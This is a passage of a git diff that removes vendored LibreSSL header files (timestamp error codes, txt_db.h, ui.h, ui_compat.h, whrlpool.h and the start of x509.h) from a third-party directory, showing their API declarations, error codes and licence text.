-#define TS_F_TS_RESP_CTX_SET_DEF_POLICY			 130
-#define TS_F_TS_RESP_CTX_SET_SIGNER_CERT		 131
-#define TS_F_TS_RESP_CTX_SET_STATUS_INFO		 132
-#define TS_F_TS_RESP_GET_POLICY				 133
-#define TS_F_TS_RESP_SET_GENTIME_WITH_PRECISION		 134
-#define TS_F_TS_RESP_SET_STATUS_INFO			 135
-#define TS_F_TS_RESP_SET_TST_INFO			 150
-#define TS_F_TS_RESP_SIGN				 136
-#define TS_F_TS_RESP_VERIFY_SIGNATURE			 106
-#define TS_F_TS_RESP_VERIFY_TOKEN			 107
-#define TS_F_TS_TST_INFO_SET_ACCURACY			 137
-#define TS_F_TS_TST_INFO_SET_MSG_IMPRINT		 138
-#define TS_F_TS_TST_INFO_SET_NONCE			 139
-#define TS_F_TS_TST_INFO_SET_POLICY_ID			 140
-#define TS_F_TS_TST_INFO_SET_SERIAL			 141
-#define TS_F_TS_TST_INFO_SET_TIME			 142
-#define TS_F_TS_TST_INFO_SET_TSA			 143
-#define TS_F_TS_VERIFY					 108
-#define TS_F_TS_VERIFY_CERT				 109
-#define TS_F_TS_VERIFY_CTX_NEW				 144
-
-/* Reason codes. */
-#define TS_R_BAD_PKCS7_TYPE				 132
-#define TS_R_BAD_TYPE					 133
-#define TS_R_CERTIFICATE_VERIFY_ERROR			 100
-#define TS_R_COULD_NOT_SET_ENGINE			 127
-#define TS_R_COULD_NOT_SET_TIME				 115
-#define TS_R_D2I_TS_RESP_INT_FAILED			 128
-#define TS_R_DETACHED_CONTENT				 134
-#define TS_R_ESS_ADD_SIGNING_CERT_ERROR			 116
-#define TS_R_ESS_SIGNING_CERTIFICATE_ERROR		 101
-#define TS_R_INVALID_NULL_POINTER			 102
-#define TS_R_INVALID_SIGNER_CERTIFICATE_PURPOSE		 117
-#define TS_R_MESSAGE_IMPRINT_MISMATCH			 103
-#define TS_R_NONCE_MISMATCH				 104
-#define TS_R_NONCE_NOT_RETURNED				 105
-#define TS_R_NO_CONTENT					 106
-#define TS_R_NO_TIME_STAMP_TOKEN			 107
-#define TS_R_PKCS7_ADD_SIGNATURE_ERROR			 118
-#define TS_R_PKCS7_ADD_SIGNED_ATTR_ERROR		 119
-#define TS_R_PKCS7_TO_TS_TST_INFO_FAILED		 129
-#define TS_R_POLICY_MISMATCH				 108
-#define TS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 120
-#define TS_R_RESPONSE_SETUP_ERROR			 121
-#define TS_R_SIGNATURE_FAILURE				 109
-#define TS_R_THERE_MUST_BE_ONE_SIGNER			 110
-#define TS_R_TIME_SYSCALL_ERROR				 122
-#define TS_R_TOKEN_NOT_PRESENT				 130
-#define TS_R_TOKEN_PRESENT				 131
-#define TS_R_TSA_NAME_MISMATCH				 111
-#define TS_R_TSA_UNTRUSTED				 112
-#define TS_R_TST_INFO_SETUP_ERROR			 123
-#define TS_R_TS_DATASIGN				 124
-#define TS_R_UNACCEPTABLE_POLICY			 125
-#define TS_R_UNSUPPORTED_MD_ALGORITHM			 126
-#define TS_R_UNSUPPORTED_VERSION			 113
-#define TS_R_WRONG_CONTENT_TYPE				 114
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/txt_db.h b/thirdparty/libressl/include/openssl/txt_db.h
deleted file mode 100644
index 56b6b42..0000000
--- a/thirdparty/libressl/include/openssl/txt_db.h
+++ /dev/null
@@ -1,112 +0,0 @@
-/* $OpenBSD: txt_db.h,v 1.9 2014/07/10 22:45:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_TXT_DB_H
-#define HEADER_TXT_DB_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/lhash.h>
-
-#define DB_ERROR_OK			0
-#define DB_ERROR_MALLOC			1
-#define DB_ERROR_INDEX_CLASH    	2
-#define DB_ERROR_INDEX_OUT_OF_RANGE	3
-#define DB_ERROR_NO_INDEX		4
-#define DB_ERROR_INSERT_INDEX_CLASH    	5
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef OPENSSL_STRING *OPENSSL_PSTRING;
-DECLARE_SPECIAL_STACK_OF(OPENSSL_PSTRING, OPENSSL_STRING)
-
-typedef struct txt_db_st {
-	int num_fields;
-	STACK_OF(OPENSSL_PSTRING) *data;
-	LHASH_OF(OPENSSL_STRING) **index;
-	int (**qual)(OPENSSL_STRING *);
-	long error;
-	long arg1;
-	long arg2;
-	OPENSSL_STRING *arg_row;
-} TXT_DB;
-
-#ifndef OPENSSL_NO_BIO
-TXT_DB *TXT_DB_read(BIO *in, int num);
-long TXT_DB_write(BIO *out, TXT_DB *db);
-#else
-TXT_DB *TXT_DB_read(char *in, int num);
-long TXT_DB_write(char *out, TXT_DB *db);
-#endif
-int TXT_DB_create_index(TXT_DB *db, int field, int (*qual)(OPENSSL_STRING *),
-    LHASH_HASH_FN_TYPE hash, LHASH_COMP_FN_TYPE cmp);
-void TXT_DB_free(TXT_DB *db);
-OPENSSL_STRING *TXT_DB_get_by_index(TXT_DB *db, int idx, OPENSSL_STRING *value);
-int TXT_DB_insert(TXT_DB *db, OPENSSL_STRING *value);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ui.h b/thirdparty/libressl/include/openssl/ui.h
deleted file mode 100644
index b6b0075..0000000
--- a/thirdparty/libressl/include/openssl/ui.h
+++ /dev/null
@@ -1,384 +0,0 @@
-/* $OpenBSD: ui.h,v 1.9 2014/07/10 22:45:58 jsing Exp $ */
-/* Written by Richard Levitte (richard@levitte.org) for the OpenSSL
- * project 2001.
- */
-/* ====================================================================
- * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_UI_H
-#define HEADER_UI_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/crypto.h>
-#endif
-#include <openssl/safestack.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Declared already in ossl_typ.h */
-/* typedef struct ui_st UI; */
-/* typedef struct ui_method_st UI_METHOD; */
-
-
-/* All the following functions return -1 or NULL on error and in some cases
-   (UI_process()) -2 if interrupted or in some other way cancelled.
-   When everything is fine, they return 0, a positive value or a non-NULL
-   pointer, all depending on their purpose. */
-
-/* Creators and destructor.   */
-UI *UI_new(void);
-UI *UI_new_method(const UI_METHOD *method);
-void UI_free(UI *ui);
-
-/* The following functions are used to add strings to be printed and prompt
-   strings to prompt for data.  The names are UI_{add,dup}_<function>_string
-   and UI_{add,dup}_input_boolean.
-
-   UI_{add,dup}_<function>_string have the following meanings:
-	add	add a text or prompt string.  The pointers given to these
-		functions are used verbatim, no copying is done.
-	dup	make a copy of the text or prompt string, then add the copy
-		to the collection of strings in the user interface.
-	<function>
-		The function is a name for the functionality that the given
-		string shall be used for.  It can be one of:
-			input	use the string as data prompt.
-			verify	use the string as verification prompt.  This
-				is used to verify a previous input.
-			info	use the string for informational output.
-			error	use the string for error output.
-   Honestly, there's currently no difference between info and error for the
-   moment.
-
-   UI_{add,dup}_input_boolean have the same semantics for "add" and "dup",
-   and are typically used when one wants to prompt for a yes/no response.
-
-
-   All of the functions in this group take a UI and a prompt string.
-   The string input and verify addition functions also take a flag argument,
-   a buffer for the result to end up with, a minimum input size and a maximum
-   input size (the result buffer MUST be large enough to be able to contain
-   the maximum number of characters).  Additionally, the verify addition
-   functions takes another buffer to compare the result against.
-   The boolean input functions take an action description string (which should
-   be safe to ignore if the expected user action is obvious, for example with
-   a dialog box with an OK button and a Cancel button), a string of acceptable
-   characters to mean OK and to mean Cancel.  The two last strings are checked
-   to make sure they don't have common characters.  Additionally, the same
-   flag argument as for the string input is taken, as well as a result buffer.
-   The result buffer is required to be at least one byte long.  Depending on
-   the answer, the first character from the OK or the Cancel character strings
-   will be stored in the first byte of the result buffer.  No NUL will be
-   added, so the result is *not* a string.
-
-   On success, the all return an index of the added information.  That index
-   is usefull when retrieving results with UI_get0_result(). */
-int UI_add_input_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize);
-int UI_dup_input_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize);
-int UI_add_verify_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize, const char *test_buf);
-int UI_dup_verify_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize, const char *test_buf);
-int UI_add_input_boolean(UI *ui, const char *prompt, const char *action_desc,
-    const char *ok_chars, const char *cancel_chars,
-    int flags, char *result_buf);
-int UI_dup_input_boolean(UI *ui, const char *prompt, const char *action_desc,
-    const char *ok_chars, const char *cancel_chars,
-    int flags, char *result_buf);
-int UI_add_info_string(UI *ui, const char *text);
-int UI_dup_info_string(UI *ui, const char *text);
-int UI_add_error_string(UI *ui, const char *text);
-int UI_dup_error_string(UI *ui, const char *text);
-
-/* These are the possible flags.  They can be or'ed together. */
-/* Use to have echoing of input */
-#define UI_INPUT_FLAG_ECHO		0x01
-/* Use a default password.  Where that password is found is completely
-   up to the application, it might for example be in the user data set
-   with UI_add_user_data().  It is not recommended to have more than
-   one input in each UI being marked with this flag, or the application
-   might get confused. */
-#define UI_INPUT_FLAG_DEFAULT_PWD	0x02
-
-/* The user of these routines may want to define flags of their own.  The core
-   UI won't look at those, but will pass them on to the method routines.  They
-   must use higher bits so they don't get confused with the UI bits above.
-   UI_INPUT_FLAG_USER_BASE tells which is the lowest bit to use.  A good
-   example of use is this:
-
-	#define MY_UI_FLAG1	(0x01 << UI_INPUT_FLAG_USER_BASE)
-
-*/
-#define UI_INPUT_FLAG_USER_BASE	16
-
-
-/* The following function helps construct a prompt.  object_desc is a
-   textual short description of the object, for example "pass phrase",
-   and object_name is the name of the object (might be a card name or
-   a file name.
-   The returned string shall always be allocated on the heap with
-   malloc(), and need to be free'd with free().
-
-   If the ui_method doesn't contain a pointer to a user-defined prompt
-   constructor, a default string is built, looking like this:
-
-	"Enter {object_desc} for {object_name}:"
-
-   So, if object_desc has the value "pass phrase" and object_name has
-   the value "foo.key", the resulting string is:
-
-	"Enter pass phrase for foo.key:"
-*/
-char *UI_construct_prompt(UI *ui_method, const char *object_desc,
-    const char *object_name);
-
-
-/* The following function is used to store a pointer to user-specific data.
-   Any previous such pointer will be returned and replaced.
-
-   For callback purposes, this function makes a lot more sense than using
-   ex_data, since the latter requires that different parts of OpenSSL or
-   applications share the same ex_data index.
-
-   Note that the UI_OpenSSL() method completely ignores the user data.
-   Other methods may not, however.  */
-void *UI_add_user_data(UI *ui, void *user_data);
-/* We need a user data retrieving function as well.  */
-void *UI_get0_user_data(UI *ui);
-
-/* Return the result associated with a prompt given with the index i. */
-const char *UI_get0_result(UI *ui, int i);
-
-/* When all strings have been added, process the whole thing. */
-int UI_process(UI *ui);
-
-/* Give a user interface parametrised control commands.  This can be used to
-   send down an integer, a data pointer or a function pointer, as well as
-   be used to get information from a UI. */
-int UI_ctrl(UI *ui, int cmd, long i, void *p, void (*f)(void));
-
-/* The commands */
-/* Use UI_CONTROL_PRINT_ERRORS with the value 1 to have UI_process print the
-   OpenSSL error stack before printing any info or added error messages and
-   before any prompting. */
-#define UI_CTRL_PRINT_ERRORS		1
-/* Check if a UI_process() is possible to do again with the same instance of
-   a user interface.  This makes UI_ctrl() return 1 if it is redoable, and 0
-   if not. */
-#define UI_CTRL_IS_REDOABLE		2
-
-
-/* Some methods may use extra data */
-#define UI_set_app_data(s,arg)         UI_set_ex_data(s,0,arg)
-#define UI_get_app_data(s)             UI_get_ex_data(s,0)
-int UI_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int UI_set_ex_data(UI *r, int idx, void *arg);
-void *UI_get_ex_data(UI *r, int idx);
-
-/* Use specific methods instead of the built-in one */
-void UI_set_default_method(const UI_METHOD *meth);
-const UI_METHOD *UI_get_default_method(void);
-const UI_METHOD *UI_get_method(UI *ui);
-const UI_METHOD *UI_set_method(UI *ui, const UI_METHOD *meth);
-
-/* The method with all the built-in thingies */
-UI_METHOD *UI_OpenSSL(void);
-
-
-/* ---------- For method writers ---------- */
-/* A method contains a number of functions that implement the low level
-   of the User Interface.  The functions are:
-
-	an opener	This function starts a session, maybe by opening
-			a channel to a tty, or by opening a window.
-	a writer	This function is called to write a given string,
-			maybe to the tty, maybe as a field label in a
-			window.
-	a flusher	This function is called to flush everything that
-			has been output so far.  It can be used to actually
-			display a dialog box after it has been built.
-	a reader	This function is called to read a given prompt,
-			maybe from the tty, maybe from a field in a
-			window.  Note that it's called wth all string
-			structures, not only the prompt ones, so it must
-			check such things itself.
-	a closer	This function closes the session, maybe by closing
-			the channel to the tty, or closing the window.
-
-   All these functions are expected to return:
-
-	0	on error.
-	1	on success.
-	-1	on out-of-band events, for example if some prompting has
-		been canceled (by pressing Ctrl-C, for example).  This is
-		only checked when returned by the flusher or the reader.
-
-   The way this is used, the opener is first called, then the writer for all
-   strings, then the flusher, then the reader for all strings and finally the
-   closer.  Note that if you want to prompt from a terminal or other command
-   line interface, the best is to have the reader also write the prompts
-   instead of having the writer do it.  If you want to prompt from a dialog
-   box, the writer can be used to build up the contents of the box, and the
-   flusher to actually display the box and run the event loop until all data
-   has been given, after which the reader only grabs the given data and puts
-   them back into the UI strings.
-
-   All method functions take a UI as argument.  Additionally, the writer and
-   the reader take a UI_STRING.
-*/
-
-/* The UI_STRING type is the data structure that contains all the needed info
-   about a string or a prompt, including test data for a verification prompt.
-*/
-typedef struct ui_string_st UI_STRING;
-DECLARE_STACK_OF(UI_STRING)
-
-/* The different types of strings that are currently supported.
-   This is only needed by method authors. */
-enum UI_string_types {
-	UIT_NONE = 0,
-	UIT_PROMPT,		/* Prompt for a string */
-	UIT_VERIFY,		/* Prompt for a string and verify */
-	UIT_BOOLEAN,		/* Prompt for a yes/no response */
-	UIT_INFO,		/* Send info to the user */
-	UIT_ERROR		/* Send an error message to the user */
-};
-
-/* Create and manipulate methods */
-UI_METHOD *UI_create_method(char *name);
-void UI_destroy_method(UI_METHOD *ui_method);
-int UI_method_set_opener(UI_METHOD *method, int (*opener)(UI *ui));
-int UI_method_set_writer(UI_METHOD *method, int (*writer)(UI *ui, UI_STRING *uis));
-int UI_method_set_flusher(UI_METHOD *method, int (*flusher)(UI *ui));
-int UI_method_set_reader(UI_METHOD *method, int (*reader)(UI *ui, UI_STRING *uis));
-int UI_method_set_closer(UI_METHOD *method, int (*closer)(UI *ui));
-int UI_method_set_prompt_constructor(UI_METHOD *method, char *(*prompt_constructor)(UI* ui, const char* object_desc, const char* object_name));
-int (*UI_method_get_opener(UI_METHOD *method))(UI*);
-int (*UI_method_get_writer(UI_METHOD *method))(UI*, UI_STRING*);
-int (*UI_method_get_flusher(UI_METHOD *method))(UI*);
-int (*UI_method_get_reader(UI_METHOD *method))(UI*, UI_STRING*);
-int (*UI_method_get_closer(UI_METHOD *method))(UI*);
-char * (*UI_method_get_prompt_constructor(UI_METHOD *method))(UI*, const char*, const char*);
-
-/* The following functions are helpers for method writers to access relevant
-   data from a UI_STRING. */
-
-/* Return type of the UI_STRING */
-enum UI_string_types UI_get_string_type(UI_STRING *uis);
-/* Return input flags of the UI_STRING */
-int UI_get_input_flags(UI_STRING *uis);
-/* Return the actual string to output (the prompt, info or error) */
-const char *UI_get0_output_string(UI_STRING *uis);
-/* Return the optional action string to output (the boolean promtp instruction) */
-const char *UI_get0_action_string(UI_STRING *uis);
-/* Return the result of a prompt */
-const char *UI_get0_result_string(UI_STRING *uis);
-/* Return the string to test the result against.  Only useful with verifies. */
-const char *UI_get0_test_string(UI_STRING *uis);
-/* Return the required minimum size of the result */
-int UI_get_result_minsize(UI_STRING *uis);
-/* Return the required maximum size of the result */
-int UI_get_result_maxsize(UI_STRING *uis);
-/* Set the result of a UI_STRING. */
-int UI_set_result(UI *ui, UI_STRING *uis, const char *result);
-
-
-/* A couple of popular utility functions */
-int UI_UTIL_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int UI_UTIL_read_pw(char *buf, char *buff, int size, const char *prompt, int verify);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_UI_strings(void);
-
-/* Error codes for the UI functions. */
-
-/* Function codes. */
-#define UI_F_GENERAL_ALLOCATE_BOOLEAN			 108
-#define UI_F_GENERAL_ALLOCATE_PROMPT			 109
-#define UI_F_GENERAL_ALLOCATE_STRING			 100
-#define UI_F_UI_CTRL					 111
-#define UI_F_UI_DUP_ERROR_STRING			 101
-#define UI_F_UI_DUP_INFO_STRING				 102
-#define UI_F_UI_DUP_INPUT_BOOLEAN			 110
-#define UI_F_UI_DUP_INPUT_STRING			 103
-#define UI_F_UI_DUP_VERIFY_STRING			 106
-#define UI_F_UI_GET0_RESULT				 107
-#define UI_F_UI_NEW_METHOD				 104
-#define UI_F_UI_SET_RESULT				 105
-
-/* Reason codes. */
-#define UI_R_COMMON_OK_AND_CANCEL_CHARACTERS		 104
-#define UI_R_INDEX_TOO_LARGE				 102
-#define UI_R_INDEX_TOO_SMALL				 103
-#define UI_R_NO_RESULT_BUFFER				 105
-#define UI_R_RESULT_TOO_LARGE				 100
-#define UI_R_RESULT_TOO_SMALL				 101
-#define UI_R_UNKNOWN_CONTROL_COMMAND			 106
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ui_compat.h b/thirdparty/libressl/include/openssl/ui_compat.h
deleted file mode 100644
index 860e80c..0000000
--- a/thirdparty/libressl/include/openssl/ui_compat.h
+++ /dev/null
@@ -1,83 +0,0 @@
-/* $OpenBSD: ui_compat.h,v 1.4 2014/06/12 15:49:31 deraadt Exp $ */
-/* Written by Richard Levitte (richard@levitte.org) for the OpenSSL
- * project 2001.
- */
-/* ====================================================================
- * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_UI_COMPAT_H
-#define HEADER_UI_COMPAT_H
-
-#include <openssl/opensslconf.h>
-#include <openssl/ui.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* The following functions were previously part of the DES section,
-   and are provided here for backward compatibility reasons. */
-
-#define des_read_pw_string(b,l,p,v) \
-	_ossl_old_des_read_pw_string((b),(l),(p),(v))
-#define des_read_pw(b,bf,s,p,v) \
-	_ossl_old_des_read_pw((b),(bf),(s),(p),(v))
-
-int _ossl_old_des_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int _ossl_old_des_read_pw(char *buf, char *buff, int size, const char *prompt, int verify);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/whrlpool.h b/thirdparty/libressl/include/openssl/whrlpool.h
deleted file mode 100644
index 875d34f..0000000
--- a/thirdparty/libressl/include/openssl/whrlpool.h
+++ /dev/null
@@ -1,41 +0,0 @@
-/* $OpenBSD: whrlpool.h,v 1.5 2014/07/10 22:45:58 jsing Exp $ */
-
-#include <stddef.h>
-
-#ifndef HEADER_WHRLPOOL_H
-#define HEADER_WHRLPOOL_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define WHIRLPOOL_DIGEST_LENGTH	(512/8)
-#define WHIRLPOOL_BBLOCK	512
-#define WHIRLPOOL_COUNTER	(256/8)
-
-typedef struct	{
-	union	{
-		unsigned char	c[WHIRLPOOL_DIGEST_LENGTH];
-		/* double q is here to ensure 64-bit alignment */
-		double		q[WHIRLPOOL_DIGEST_LENGTH/sizeof(double)];
-		}	H;
-	unsigned char	data[WHIRLPOOL_BBLOCK/8];
-	unsigned int	bitoff;
-	size_t		bitlen[WHIRLPOOL_COUNTER/sizeof(size_t)];
-	} WHIRLPOOL_CTX;
-
-#ifndef OPENSSL_NO_WHIRLPOOL
-int WHIRLPOOL_Init	(WHIRLPOOL_CTX *c);
-int WHIRLPOOL_Update	(WHIRLPOOL_CTX *c,const void *inp,size_t bytes);
-void WHIRLPOOL_BitUpdate(WHIRLPOOL_CTX *c,const void *inp,size_t bits);
-int WHIRLPOOL_Final	(unsigned char *md,WHIRLPOOL_CTX *c);
-unsigned char *WHIRLPOOL(const void *inp,size_t bytes,unsigned char *md);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/x509.h b/thirdparty/libressl/include/openssl/x509.h
deleted file mode 100644
index 2949325..0000000
--- a/thirdparty/libressl/include/openssl/x509.h
+++ /dev/null
@@ -1,1378 +0,0 @@
-/* $OpenBSD: x509.h,v 1.26 2016/12/27 16:05:57 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
